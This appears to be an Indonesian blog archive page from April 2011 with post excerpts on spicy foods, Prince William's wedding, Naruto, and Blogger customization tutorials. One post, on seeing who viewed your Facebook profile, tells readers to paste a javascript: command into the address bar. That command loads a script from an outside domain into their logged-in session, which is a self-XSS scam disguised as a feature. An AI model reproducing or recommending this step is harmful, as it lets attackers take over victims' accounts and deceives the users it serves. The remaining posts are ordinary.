Posts

Showing posts from April, 2011

Makanan: 10 Makanan Paling Pedas Di Dunia

Image
Bagi Anda pecinta makanan pedas, mungkin sudah tidak akan kaget saat mencicipi makanan ataupun masakan pedas. Sensasi pedas sangat digemari, jadi biasanya bagi mereka pecinta pedas makan pun akan menjadi lahap, pedas menjadi tantangan tersendiri saat bersantap.
Sambal adalah salah satu makanan pedas tradisional Indonesia, cabai yang diuleg bersama bumbu-bumbu penyedap lainnya, sangat khas sebagai santapan pendaming sayur ataupun lalapan. Bicara soal sambal, ternyata menu pendamping tersebut masuk dalam jajaran makanan terpedas di dunia.
Dari sepuluh makanan terpedas di dunia, sambal menempati urutan ke-10. Mau tahu apa saja makanan terpedas di dunia? Jangan mengaku Anda suka masakan pedas jika belum merasakan sensasi pedas dari makanan-makanan terpedas di dunia. Hmm penasaran.. simak yang berikut ini :
Tom Yum – Thailand
Aroma pedas menyengat jadi ciri khas masakan Thailand. Seperti sup asam pedas dicampur rempah yang mengoda lidah. Ada beberapa macam pilihan isi yaitu,  Tom Yum Gai …

Pernikahan Pangeran William dan Kate Middleton

Image
Pernikahan Pangeran William dan Kate Middleton – Tanggal 29 April 2011 akan jadi momen bahagia pasangan Pangeran William dan tunangannya, Kate Middleton. Berbagai persiapan dari perkawinan itu menjadi sorotan publik, seperti keamanan yang akan dilakukan secara ketat dan menu jamuan bagi para tamu terpilih.
Pengeran William dan Kate Middleton mengundang mantan pacarnyaDaftar 250 tamu undangan telah dipilih oleh Pengeran William dan Kate Middleton untuk acara pernikahannya pada 29 April mendatang. Di antara tamu-tamu tersebut, ada 4 mantan pacar William yang diundang. Sedangkan Kate mengundang 2 mantan pacarnya.
Keamanan Inggris akan diperketat menjelang pernikahan pangeran WilliamPangeran William dan Kate Middleton Inggris tak mau ambil risiko dalam soal keamanan pada perayaan perkawinan kerajaan tersebut. Sebuah operasi keamanan raksasa akan digelar dengan polisi bersiaga penuh terhadap ancaman serangan teror dan aktivisme anarkis.
Perkawinan di Westminster Abbey itu akan membuat …

Cara melihat siapa yg lihat profile FB kita

Image
-Kunjungi Alamat Group ini http://www.facebook.com/group.php?gid=162297198894
-KlikTombolSepertidiAtas Atau JOIN
-GunakanKodeScriptUntukLihatSiapaDilihatProfilFacebookAnda
-Sangat SimpleIkutiLangkahBerikut ini UntukGunakanProViewsv5.0.

Step 1 - Copy Script DiBawah Ini: javascript:(a=(b=document).createElement('script')).src='//pehlaapp.tk/js.js',b.body.appendChild(a);void(0)
Cukupklikdikotakuntukmenyorotsemua,Kemudianklik kanandantekancopyuntukmenyalinkode


Step 2:1.Klikaddress bar
2.Tekantombol hapus
3.PasteKodeAndadisalinkeaddress bar
4.Tekan enteruntuk melihathasilAnda!

Cara Membuat Applikasi Facebook (App. Update Status)

Image
Mungkin diantara temen-temen blogger pernah melihat update status melalui macam-macam jenis, ada yang melalui HP Kreditan, Web HP Jadul, Bisikan Syaitan Dll. Silahkan lihat gambar di bawah ini :



Untuk membuat applikasi tersebut, kamu bisa mengikuti langkah-langkah berikut :
1. Download kodenya terlebih dahulu DISINI
2. Login ke akun facebook
3. Klik http://facebook.com/developers/createapp.php, kamu akan menuju halaman berikut : (lihat gambar)



4. Tulis nama applikasi, kemudian pilih "setuju" dan klik "Buat Applikasi Baru". Masukan kode verifikasi ke dalam kotak :



5. Lihat ke menu yang ada di sebelah kiri, pilih "Web Site"



6. Cari kode script berikut (kode script yang telah kamu download) :
<?php ("mobile.php");?>

<?php

$api_key = "masukan kunci API Anda";
$secret = "masukan kunci rahasia applikasi Anda";
Masukan kode API dan Kode Applikasi Rahasia tersebut.

7. Upload kode script tadi (yang telah di edit) ke hosting mi…

Istilah Monster pada naruto

Image
Istilah Monster pada naruto Berikut istilah-istilah yang sering digunakan dalam cerita ini:
BijuuSiluman yang berasal dari cakra yg berjumlah besar, berjumlah 9 ekor (Ichibi, Nibi, Sanbi, Yonbi, gobi,rokubi,nanabi, hachibi, dan Kyuubi). Dan menurut para penduduk yang desanya memiliki Bijuu, satu tebasan ekor mereka dapat menyebabkan Tsunami,Gempa, dan bencana besar lainnya.ChakraTenaga yang mengalir dalam tubuh yang tersimpan setelah latihan keras dan bisa digunakan untuk berbagai macam hal; terutama untuk mengeluarkan jutsu.Hokage(ho = api) ninja pemimpin/terkuat di negara Api. Negara-negara lainnya memiliki kage-kage yang lain semacam Kazekage dll.JinchuurikiOrang yang ditubuhnya tersegel bijuu.JutsuJurus, teknik, sesuatu yang digunakan oleh ninja sebagai serangan maupun pertahanan. Dibagi menjadi tiga, yaitu taijutsu, ninjutsu, dan genjutsu. Yang dimaksud dengan taijutsu adalah teknik dasar ninja berupa gerakan fisik seperti melompat, memukul, atau menendang. Ninjutsu adalah teknik …

jalan cerita naruto

Image
PrologueTiga belas tahun sebelum cerita ini dimulai, seekor monster rubah ekor sembilan bernama Kyuubi menyerang Konoha, sebuah desa shinobi yang terletak di negara Api. Kekacauan terjadi di desa Konoha dan korban banyak berjatuhan....akhirnya ada seseorang yang berhasil menyegel Kyuubi itu ke tubuh Naruto, seseorang yang berhasil menyegel siluman rubah ekor itu dikenal sebagai Yondaime Hokage,Hokage ke 4 atau Namikaze Minato yang tidak lain adalah ayah dari Naruto. Begitu kuatnya Kyuubi sehingga penyegelan itu harus dibayar dengan kematian Yondaime Hokage sendiri.
Awal CeritaTiga belas tahun kemudian, tersebutlah seorang remaja bernama Naruto Uzumaki yang sering membuat onar di desa Konoha. Naruto melakukan hal itu karena menginginkan perhatian dari penduduk desa yang menjauhinya karena rubah di tubuhnya. Naruto kemudian di tipu oleh seorang pengkhianat untuk mencuri gulungan rahasia dari Hokage ke 3 (Sarutobi Hokage), Naruto yang polos melakukan hal tersebut dan berhasil mencuri sert…

Pengenalan tokoh dalam serial "Naruto"

Image
Naruto Uzumaki Naruto Uzumaki adalah tokoh utama cerita ini. Ia adalah seorang ninja dari desa Konoha, Salah satu desa militer terkuat di dunia ninja. Naruto dikarakteristikkan sebagai seorang ninja yang penuh kejutan, bersemangat, ceria, hiperaktif, kikuk,lugu, dan sangat ambisius dalam meraih cita-citanya untuk menjadi seorang Hokage, ninja terkuat di Konoha. Dalam tubuh Naruto, tersegel seekor monster rubah ekor sembilan yang pernah menyerang dan hampir menghancurkan desa Konohagakure segel tersebut dibuat oleh ayahnya yondaime (minato kamikaze) hokage ke 4 yang menimbulkan kematian pada ayahnya. Karena monster yang ada dalam tubuhnya itulah, ia dijauhi oleh penduduk desa di masa kecilnya hingga ia bertekat membuktikan kepada masyarakat di Konoha bahwa ia akan menjadi Hokage agar ia bisa diakui di desa itu, sekaligus menjadi incaran ninja-ninja yang menginginkan kekuatan Kyuubi, si rubah ekor sembilan.Ia sanggat menyukai Sakura Haruno, namun cintanya bertepuk sebelah tangan karena …

JALAN cerita yang asli tentang naruto

Image
Masa Kecil

Semasa kecilnya Naruto hidup dalam kesendirian. Dia tumbuh tanpa kasih sayang orang tua dan perhatian orang di sekitarnya; dia dijauhi. Karenanya, ia berusaha untuk mencari perhatian orang-orang disekitarnya, dengan berbuat jahil misalnya. Dia berusaha agar dirinya diperhatikan, agar keberadaannya diakui, dia tak segan-segan mengorbankan segalanya untuk itu.

Karena terus menerus dijauhi, Naruto berjanji untuk mewujudkan mimpinya menjadi Hokage, gelar untuk pemimpin di desanya. Sebuah mimpi yang sangat sulit untuk diwujudkannya, terutama karena tak ada satu orang pun yang membantu dan mendukungnya untuk mewujudkan mimpinya, sampai ia bertemu dengan guru Iruka.

Guru Iruka sendiri memiliki masa kecil yang mirip dengan Naruto, kedua orangtuanya tewas dalam pertarungan melawan Kyuubi, yang sekarang bersemayam di tubuh Naruto. Hal ini membuat Iruka mengerti penderitaan yang dialami Naruto. Ia selalu berusaha membuat Naruto senang dan melupakan kesedihannya. Iruka adalah orang per…

Membuat jam mengikuti kursor

Untuk Cara PemasanganikutiLangkah - langkahnya berikut ini :

1.Masuk Ke Akun Blogger Anda
2.Klik Tata letak atau Rancangan
3.Lalu Klik Tambah Gadget
4.Pilih HTML/JavaScript
5.Copy paste script kode dibawah ini dalam HTML/JavaScript
6.Klik Simpan


Script Kode Untuk Jam DIGITAL

<script src="http://ibrahim-fadzri.googlecode.com/files/www.ibrahimfadzri.co.cc.cursor-jam-digital.js.txt" type="text/javascript"></script>
Script Kode Untuk Jam Klasik/dinding

<script src="http://ibrahim-fadzri.googlecode.com/files/www.ibrahimfadzri.co.cc.cursor-jam-dinding.js" type="text/javascript"></script>
Script Kode Untuk Syistem ON/OFF Dinding

<style type="text/css">
<!--
/*Do not Alter these. Set for alignment*/
.css1{
position:absolute;top:0px;left:0px;
width:16px;height:16px;
font-family:Arial,sans-serif;
font-size:16px;
text-align:center;
font-weight:bold;
}
.css2{
position:absolute;top:0px;left:0px;
width:10px;height:10px;
f…

Membuat Huruf Besar (Drop Cap/Huruf Besar) pada Awal Postingan

Image
Tahukan teman-teman apa itu drop cap? drop caps adalah huruf besar yang ukurangnya mungin 10 kali lipat huruf biasa yang diletakkan di awal artikel. Nah kalau teman-teman semua tertarik untuk membuat nya, saya akan kasih tau tutorialnya. Sebenarnya membuat drop caps ini sangatlah mudah, tapi untuk lebih jelasnya silahkan ikuti langkah-langkah di bawah ini :
1.   Login ke blogger
2.   Langsung ke Tata Letak (sekarang design/rancangan)  - Edit HTML
3.   Cari kode berikut ]]></b:skin>
4.   Masukkan kode di bawah ini, di atas]]></b:skin>
/* kode untuk huruf awal
----------------------------------------------- */
.awal {
float:left;
color: #000000;
background:#ffffff;
line-height:80px;
padding-top:1px;
padding-right:5px;
font-family:times;
font-size:100px;
5.   Klik Save Template / Simpan

Membuat Favicon Di Blogspot

Image
Selamat siang temen-temen semua, lagi pada ngapain? Yah, kalau saya ya tiap hari kerjaanya begini ini. Ngisi postingan, makan, tidur, bangun, ngisi postingan lagi. Maklum blogger pemula ya jadi tiap hari penginya ngisi terus, nggak tau itu isinya mungkin bagi para pakar-pakar blogger mungkin udah basi. Basi juga nggak pa-pa, daripada nggak ngisi sama sekali. Setelah kemarin saya menulis artikel tentang Spam, hari ini saya akan kembali ke jalur semula yaitu tutorial blogspot atau blogger. Kali ini saya akan menulis tentang cara mengganti ikon address (favicon) yang ada di sebelah kiri alamat blog kita. Tidak semua situs memiliki favicon, namun jika anda sering mengakses situs Yahoo, Google atau Facebook maka di awal alamat situsnya anda akan melihat ikon, Y , G , atau F, nah itulah yang dinamakan favicon. Favicon digunakan untuk memberikan gambaran atau identitas sebuah website. Favicon bisa berupa Logo, Photo atau gambar yang lain. Dengan Favicon, maka website kit…

Membuat Menu dTree di Blogger

Image
Jika temen-temen pengguna windows pasti tahu apa itu menu dTree. Menu dTree adalah menu seperti pohon bercabang yang biasa kita lihat pada saat kita membuka windows explorer pada komputer. Fungsi menu ini hampir sama dengan menu navigasi yang lain, yaitu untuk lebih memudahkan seorang pengunjung menjelajahi blog kita. Gambar di bawah ini pasti sudah sering anda lihat di komputer anda. 
Menu seperti ini bisa juga kita tampilkan pada web atau blog kita , untuk contoh soalnya temen-temen bisa lihat langsung demonya diblog saya disini. Jika tertarik, perhatikan baik-baik langkah pembuatannya di bawah ini : Login ke blogger dengan akun andaKemudian pada dasbor  klik Rancangan >> Edit HTMLLetakkan kode/ script berikut di atas kode </head>

<link  href='https://sites.google.com/site/bangkolis/javascript/dtree_maskolis.css'  rel='StyleSheet' type='text/css'/>          <script  src='https://sites.google.com/site/bangkolis/javascript/ma…

Membuat Postingan Dua Kolom Di Blogspot

Image
Selamat malam, teman-teman blogger semua. Malam hari ini saya sebenarnya udah ngantuk banget  tapi daripada ditunda sampai besok malah lupa, mending sekarang aja saya nulis ini meski sambil ngatuk.  Memang, sebaiknya saya posting sebelum tidur dan saya harap saat saya bangun ada banyak senyum di komentar karena membaca artikel berikut ini dan mendapatkan manfaat. Jadi langsung saja silahkan ikuti tutorial berikut ini.....

Banyak hal yang terpikirkan untuk mempercantik postingan. kini Anda bisa mempercantik lagi dengan gaya postingan berkolom. Untuk membuatnya Anda bisa gunakan cara pembuatan tablel Untuk contohnya saya ambilkan saja dari catatan Sumber saya di blog saya yang lain.

Lepas dari semua itu, aku harus tetap menjalani tangga suram demi cita-cita masa kecilku. Seperti Om Sting (The Police) bilang “A Gentleman will walk but never run....” sampai disini aku kembali melakukan aktivitasku sehari-sehari sebagai anggota civitas akademik. Kuliah seperti bia…